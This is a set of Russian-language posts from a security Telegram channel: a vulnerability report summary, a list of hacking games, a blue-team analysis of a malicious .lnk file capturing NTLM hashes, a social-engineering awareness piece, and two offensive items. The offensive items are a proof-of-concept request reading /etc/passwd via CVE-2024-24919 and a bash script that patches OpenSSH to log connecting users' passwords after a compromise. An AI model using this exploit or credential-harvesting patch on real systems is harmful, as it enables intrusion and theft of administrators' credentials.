Привет, друзья! ?

Хочу поделиться интересной статьей от коллег из Kaspersky о самых популярных эксплойтах и уязвимостях за второй квартал 2024 года.

За первый квартал этого года наиболее популярными уязвимостями были различные инъекции:

1️⃣SQL Injection

2️⃣Command Injection

Во втором квартале лидеры изменились:

1️⃣Unrestricted Upload of File with Dangerous Type

2️⃣SQL Injection

3️⃣Path Traversal

Из наиболее часто эксплуатируемых CVE для Windows:

1️⃣RCE:
CVE-2018-0802, CVE-2017-11882 - уязвимости в редакторе формул ms office

CVE-2021-40444 - уязвимость в MSHTML

2️⃣LPE: CVE-2017-0199 - уязвимость в MS office и WordPad

Для Linux:

1️⃣LPE:
CVE-2022-0847, CVE-2023-2640 — уязвимости в ядре Linux

CVE-2021-4034 — уязвимость в утилите pkexec

? Подробнее можно прочитать здесь: vulnerability-exploit-report-q2-2024

Главное, друзья, без паники ?! Грамотный мониторинг сети, своевременный патч-менеджмент и комплексный подход к защите, включая обучение сотрудников основам ИБ, помогут вам сохранить спокойствие и безопасность.

Всем хорошей рабочей недели и будьте в безопасности! ?

#blueteam

securelist.ru

Анализ ландшафта уязвимостей во втором квартале 2024 года

Отчет содержит статистику по уязвимостям и эксплойтам, а также разбор интересных уязвимостей, обнаруженных во втором квартале 2024 года.

Так уж получилось, что мы попали под недавнюю багу в обновлении windows. Мы, настроенные порешать таски на второй день, решили взять ноут, но вот обновлять винду было ошибкой. Grub перестал загружаться, и выяснялось это как раз в тот момент, когда сели решать таски. ?

Ну а в общем по офзону всё как всегда - куча активностей, докладов и мерча. И не менее важная фишка - постоянные очереди на стендах. Но проводить время всё равно приятно и интересно.

? Привет, друзья!

Пока ещё не закончился сезон отпусков, хочу сделать небольшой обзор видеоигр про программирование и хакерство. ?

1️⃣ Начну с одной из самых популярных игр из жанра хакерства — Hacknet. Это отличный симулятор хакера, как в фильмах, со скоростным набором текста, музыкой в стиле Hotline Miami и отдельной псевдооперационной unix-like  системой. Почувствуем себя Мистером Роботом ?

2️⃣ Uplink — наверное самая старая из этого жанра (2006 год). Это тоже симулятор злоумышленника, но с уклоном в "реалистичность" и экономику типа выполняй квесты и покупай апгрейды. Но атмосфера и обстановка не менее затягивающая, как и в Hacknet.

С хакерскими всё, теперь про программирование.

3️⃣  Screeps — MMO Realtime стратегия, где каждого юнита нужно буквально программировать. Единственная проблема — официальный их язык только один - JavaScript. Есть библиотеки и на питоне, но они не официальные и давно не обновлялись. В остальном всё круто.

4️⃣ Human Resource Machine и её сиквел Seven Billion Humans. Ну тут вообще что-то невероятное. Разработчики умудрились использовать ассемблер как основной инструмент головоломки и сделать его понимание настолько простым, что проще только Scratch. В целом все игры от Tomorrow Corporation отличные.

5️⃣  Завершает список Prime Mover - в ней нужно собирать схемы из выданных логических элементов. То-есть по уровню абстракции это самая близкая к железу из перечисленного. Жаль, что она не стала так популярна, как остальные

Вот такой получился хаотичный список, на экстренный случай прокрастинации?

#NotRedteam

Не так давно был пост про подделку ярлыка для бокового перемещения. Теперь предлагаю рассмотреть, как это выглядит со стороны синей команды?.

Мы обнаружили подозрительные события перехода по SMB на неизвестный никому адрес. Определив источник событий находим неприметный .lnk файл. По событиям 4663 или 5145 журнала Security можем определить, когда именно и кем данный файл был помещен в систему.

Анализировать ВПО на рабочем\личном устройстве очень плохая идея, так что нам нужна своя лаборатория для анализа. Существует отличный проект с открытым исходным кодом - Flare VM, инструкция по установке есть в файле README и неплохая пошаговая инструкция на youtube

Анализ файлов состоит из двух частей: статический и динамический

1. Статический анализ?.

Подразумевает сбор информации о файле без его запуска:
- Метаданные (имя, размер, дата создания, дата изменения, дата доступа, информация о создателе)
- Хэш-суммы
- Структура файла (например, PE для исполняемых файлов Windows, ELF для Linux, PDF, DOCX и др.)
- Содержимое и код (дисассемблированный код для анализа логики работы приложения)
Для начала этого достаточно.

Для некоторых типов файлов есть уже готовые утилиты для анализа.
Вот какую информацию позволяет получить LECmd:

Name: Просмотр веб\-страниц Relative Path: ..\..\..\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Working Directory: C:\Program Files (x86)\Microsoft\Edge\Application Icon Location: \\1.45.136[.]217\share

В поле Icon Location располагается ссылка на потенциально вредоносный ресурс, к которому идут обращения всех пользователей, которые переходят в папку с файлом используя проводник.

Сам ярлык ведет к браузеру Microsoft Edge?.

Так же получаем информацию об имени устройства и MAC Address, на котором данный файл был создан (полезно, если устройство в домене):

Tracker database block Machine ID: hostname MAC Address: c4:03:a8:ce:c0:00 MAC Vendor: (Unknown vendor) Creation: 2023\-09\-20 16:15:08

Все необходимые данные мы получили, приступаем к следующему этапу анализа

1. Динамический анализ?‍?.

В рамках динамического анализа производится запуск файла для выявления следующих ключевых аспектов:
- Поведение программы
- Сетевое поведение
- Изменения в файловой системе
- Изменения в реестре
- Используемые системные ресурсы
- Процессное дерево
- Статистика и логирование
- Взаимодействие с другими программами и системами

Учитывая специфику нашего файла интереснее всего взглянуть на сетевой трафик при помощи Wireshark

Находим пакет Session Setup Request, NTLMSSP_AUTH, User: .\tim и видим в нем следующую информацию:

Domain name: DESKTOP\-2Q3SAD1 User name: tim Host name: DESKTOP\-2Q3SAD1 NTLMv2 Response: 561393d6c45c520cf59b0f2164a44b53:010100000000000080cc3abb5aeada011c521ff2286be6fe000000000100100052006a00620052006a006900760051000300100052006a00620052006a006900760051000200100041005a0076005100490074006d006d000400100041005a0076005100490074006d006d000700080080cc3abb5aeada0106000400020000000800300030000000000000000100000000200000ec56f98273b68c776c7aa89b1329e54f290cd1254c2586ac939288f6bd63d2370a001000000000000000000000000000000000000900260063006900660073002f003100340037002e00340035002e003100330036002e003200310037000000000000000000

В запросах видим событие передачи данных об имени хоста, с которого было осуществлено подключение, имя пользователя и NTLM хэш.

На этом можно было бы и закончить, но важно понимать, что злоумышленники могут предпринять, имея на руках NetNTLM хэш и принять соответствующие меры, а именно:

- Сбросить пароли для учетных записей пользователей, хэши чьих паролей были переданы
- Заблокировать УЗ пользователя создавшего .lnk файл
- Изолировать от сети хост (если это возможно), на котором .lnk файл был модифицирован
#blueteam

Привет, друзья! Сегодня у нас на повестке дня CVE-2024-24919. Эта уязвимость в Check Point Remote Access VPN позволяет читать файлы на хосте (LFI), причем с привилегиями root. Уязвимыми являются следующие продукты:

- CloudGuard Network
- Quantum Maestro
- Quantum Scalable Chassis
- Quantum Security Gateways
- Quantum Spark Appliances

- Версии:
- R77.20 (EOL)
- R77.30 (EOL)
- R80.10 (EOL)
- R80.20 (EOL)
- R80.20.x
- R80.20SP (EOL)
- R80.30 (EOL)
- R80.30SP (EOL)
- R80.40 (EOL)
- R81
- R81.10
- R81.10.x
- R81.20

POC

```

POST /clients/MyCRL HTTP/1.1
Host: target_host
Content-Length: 63

aCSHELL/../../../../../../../etc/passwd

```

Рекомендуем срочно установить обновления: https://support.checkpoint.com/results/sk/sk182336

#cve

Приветствую Вас, дорогие друзья!??

В крайнем своем посте делился с Вами аналитическими отчетами. Коллеги из Kaspersky, как Вы помните, поделились с нами аналитикой по направлениям Incident Response и Managed Detection and Response. И вот на этой неделе они представили на изучение свой отчет-исследование российского ландшафта киберугроз, по аналогии с ранее подготовленным от BI.ZONE. В нем всё, как мы любим: тактики, техники и процедуры злоумышленников (TTPs), применяемое ВПО и т.д. Мы с командой уже взяли его в работу. ?

Думаю, что в следующих постах наложу друг на друга наши результаты по обработке материалов от BI.ZONE и Kaspersky и поделюсь с Вами тем, какую практическую пользу мы с командой из них извлекли. Во всяком случае на основе информации от BI.ZONE уже активно разрабатываем правила корреляции и проверяем их с моими "красными" коллегами. ??‍?

Уверен, что Вам будет интересно и Вы извлечете из них максимальную пользу в своей работе.

#REDtalk #blueteam

? Привет, В дополнение к предыдущему посту хочу показать еще одну интересную “фишку” ssh

Представим ситуацию, что в процессе редтима мы получили доступ к линуксовому серверу и повысились до рута, что привело к его полной компрометации. Что делать дальше? Как продвигаться по сети?

На мой взгляд, первое, что нужно сделать после закрепления, это внедрить все возможные логгеры и прослушки пользовательского ввода.

Тут как раз приходит на помощь ssh. С его помощью можно спокойно перехватить учётные данные любого подключающегося пользователя. Но для этого нужно пропатчить и перекомпилировать openssh. Вот небольшой bash скрипт для патчинга и компиляции

```

#
# Не стоит его выполнять просто Ctrl+C Ctrl+V, и уж тем более не на какой-то важной машине ?
#

# Устанавливаем зависимости
sudo apt update
sudo apt install libpam-dev libssl-dev build-essential autoconf

# Скачиваем исходники
cd /tmp
git clone https://github.com/openssh/openssh-portable
cd openssh-portable

# Патчим
sed -e 's/^([ \t]*)(struct passwd *pw = authctxt->pw;)/\1logit("Login attempt by username '\''%s'\'', password '\''%s'\''", authctxt->user, password);\n\1\2/' -i auth-passwd.c

# Компилируем
autoreconf
./configure --with-pam
make

# Изменяем /etc/ssh/sshd_config
cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sed -e 's/^#[ ]*HostKey/HostKey/' -i /etc/ssh/sshd_config

# Заменяем ssh-сервер
sudo systemctl stop ssh
sudo mkdir /usr/local/libexec
sudo cp sshd-session /usr/local/libexec
/tmp/sshd/sshd -D -f /etc/ssh/sshd_config
```

И как результат, администратор, не зная, что машина скомпрометирована, подключается к нашему поддельному ssh-серверу и спокойно вводит учётные данные

```
2024-05-22T18:22:48.465415+03:00 ubuntu sshd[287253]: Server listening on 0.0.0.0 port 22.
2024-05-22T18:22:48.465515+03:00 ubuntu sshd[287253]: Server listening on :: port 22.
2024-05-22T18:23:05.369739+03:00 ubuntu sshd-session[287271]: Login attempt by username 'admin', password 'Sup3rStr0ngAdm1nP@ssw0rd'
2024-05-22T18:23:05.400492+03:00 ubuntu sshd-session[287271]: pam_unix(sshd-session:auth): authentication failure; logname=ubuntu uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=admin
2024-05-22T18:23:07.070018+03:00 ubuntu sshd-session[287271]: Failed password for admin from 127.0.0.1 port 35226 ssh2
2024-05-22T18:23:09.858256+03:00 ubuntu sshd-session[287271]: Login attempt by username 'admin', password 'Sup3rStr0ngAdm1nP@ssw0rd1337'
2024-05-22T18:23:09.893910+03:00 kaubuntu i sshd-session[287271]: Accepted password for admin from 127.0.0.1 port 35226 ssh2
2024-05-22T18:23:09.894635+03:00 ubuntu sshd-session[287271]: pam_unix(sshd-session:session): session opened for user admin(uid=1000) by admin(uid=0)
2024-05-22T18:23:11.862494+03:00 ubuntu sshd-session[287427]: Received disconnect from 127.0.0.1 port 35226:11: disconnected by user
2024-05-22T18:23:11.862963+03:00 ubuntu sshd-session[287427]: Disconnected from user admin 127.0.0.1 port 35226

```

Стоит упомянуть, что существует проверка сигнатуры ключа при повторных подключениях, и если открытые ключи не совпадают, то ssh-клиент не выполняет аутентификацию с грозным сообщением WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!

А упомянуть это стоит для того, что при подключении к поддельному сообщению никакой ошибки не будет, так как ключи на поддельном сервер используются те же, что и раньше ?

Как мы можем требовать, чтобы кто-то сохранил нашу тайну, если мы сами не можем её сохранить....??
©Франсуа де Ларошфуко

Приветствую Вас, дорогие друзья!??
На связи @dolgihser

Сегодня хотел бы обсудить, пожалуй, один из самых популярных методов, используемых злоумышленниками для получения конфиденциальной информации, а именно: социальную инженерию. Причем обсудить в разрезе использования мессенджеров.?

Думаю, не сделаю огромного открытия, если предположу, что практически каждый из Вас в качестве средства коммуникации для работы использует Telegram. Он удобен, он понятен, нам там очень комфортно. Да что там говорить, и я тоже большинство рабочих вопросов решаю через этот популярный мессенджер. Однако удобству использования в противовес идет и значительный риск, который заключается в том, что мы никак не контролируем этот канал обмена информацией с точки зрения информационной безопасности, т.е. обеспечения конфиденциальности.?

Именно с таким кейсом мы и столкнулись недавно: нашему сотруднику начал писать якобы ген. директор нашей компании (см. вложения). Казалось бы, всё очевидно и после первых же вопросов стоило свернуть все это общение, но тут вступает в дело психология: мы все очень разные и по-разному ведем себя в подобных ситуациях. Злоумышленники же очень здорово понимают элементы психологического воздействия и начинают сразу оказывать давление. Конкретно в нашем случае это выразилось в отправке фейковых документов от гос. органов. Хорошо, что наш коллега вовремя заподозрил неладное и незамедлительно обратился к нам. А если бы не заподозрил? Далее в дело вступил бы классический фишинг (злоумышленник спрашивает почту, определяет порядок ее оформления, например: первые буквы имени и отчества и далее фамилия + домен, после чего отправляет письмо с подменой e-mail отправителя, содержащее фишинговую ссылку либо документ).

Казалось бы, примитивнейшая ситуация, о которой все мы знаем. Но из года в год это работает, и очень успешно. По данным Positive Technologies, социальная инженерия используется в 92% кибератак на физлиц и в 37% кибератак на компании.??‍?

Конечно, прямым запретом использования популярных мессенджеров такую проблему не решить. В современном мире это практически невозможно (за исключением организаций и компаний, к которым предъявляются самые строгие требования в части обеспечения ИБ в целом и каналов коммуникации в частности). Слишком много удобных инструментов помимо общения сегодня предлагает тот же Telegram (боты, уведомляющие об алертах - наше всё?).

Однако снизить риски можно.

Во-первых, в компании должен использоваться корпоративный мессенджер, который находится в контуре Вашей инфраструктуры и доступ к которому контролируется внутри Вашей организации.
Во-вторых, до всех сотрудников должно быть доведено (желательно под роспись с накладываемой на это ответственностью), что любая конфиденциальная информация (положение о конфиденциальной информации тоже бы здорово утвердить в организации) должна направляться только в корпоративном мессенджере.
В-третьих, в связи с популярностью вышеописанной ситуации, когда пишут от имени руководства, довести до сотрудников, что никто из руководителей им не будет писать лично (минуя всю орг. структуру компании).
В-четвертых, регулярное повышение сотрудников в части информационной безопасности. Это тот самый процесс Security Awareness, о котором упоминалось ранее в одном из постов. То есть четкое понимание, к кому обращаться и что делать.

Иными словами, сотрудники должны четко понимать линию разграничения между использованием Telegram и другими общедоступными мессенджерами (локальные чаты команд для мемов) и корпоративными каналами коммуникаций.

На этом у меня, в общем-то, всё. Если Вы также сталкивались с подобными случаями - поделитесь, мне тоже будет полезно узнать, как Вы их решали.

С соблюдением кибер-гигиены,
Ваш @dolgihser?

#SOC #pentest #security #hacking #ИБ #blueteam #cybersecurity #redteam #purpleteam #кибербезопасность #REDtalk